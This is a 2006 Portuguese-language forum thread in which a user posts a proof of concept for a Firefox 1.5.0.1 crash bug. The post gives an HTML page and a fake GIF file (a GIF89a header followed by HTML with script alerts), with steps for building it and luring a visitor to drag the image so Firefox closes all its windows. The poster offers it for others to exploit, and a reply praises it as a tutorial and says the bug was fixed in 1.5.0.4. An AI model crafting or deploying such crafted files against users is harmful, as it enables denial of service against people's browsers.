Firefox <= 1.5.0.1

Started by HadeS, 03 de June , 2006, 01:12:29 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

HadeS

03 de June , 2006, 01:12:29 PM
Ae pessoal, tudo jóia?

Venho aqui trazer um BUG do Firefox 1.5.0.1, o autor verdadeiro da falha eu desconheço, mas eu estudei, cheguei a umas conclusões e editei a falha.

Ela se trata de injetar um código JavaScript numa imagem GIF.

Todos aqui devem saber que quando clicamos sobre uma imagem e arrastamos, copiamos o conteúdo (Não é bem essa expressão) dela, e no caso, vamos clicar sobre uma imagem maliciosa, e quando arrastarmos a mesma, o firefox vai travar, e fechar todas as janelas.

Atualmente, todas as versões do Firefox menores que 1.5.0.1 (Não sei se maiores estão vulneráveis) estão vulneráveis, tanto para Windows quanto para Linux.

Segue abaixo os códigos da página e da imagem.

Página:
Code Select
<html><head><title>Bug no Firefox 1.5.0.1 - HadeS</title></head>
<body>
<p>Clique sobre a imagem  e segure por alguns segundos e arrastê-a para algum lugar da tela.</p>
<br><br><br>
<img src="ff_bug.gif" border="0" height="50" width="50">
</body></html>
É um HTML simples, com intruções, e com o link para a imagem.

Agora o code da imagem:
Code Select
GIF89a
<html>
<div>
<body>
<script>window.alert("Bug no Firefox");
window.alert("Autor desconhecido. Editado por HadeS : The Lord Of Underworld");
</script>
</div>
</body>
</html>
Abra o notepad (No Windows, no caso de Linux, qualquer editor de textos), e salve como ff_bug.gif.

Agora abra a página e clique sobre a imagem e arrastê-a. Veja que lindo! Firefox fechado! Todas as janelas!

Isso é um BUG simples, mas pode ser interessante, agora o resto é com vocês. Façam um bom proveito.

HadeS

Anonymous

#1
03 de June , 2006, 01:26:37 PM
Na versão 1.5.0.4 eles corrigiram esta falha.
Este e um excelente tutorial simples e eficaz, você esta de parabéns. ;)
Print
Go Up Pages1
User actions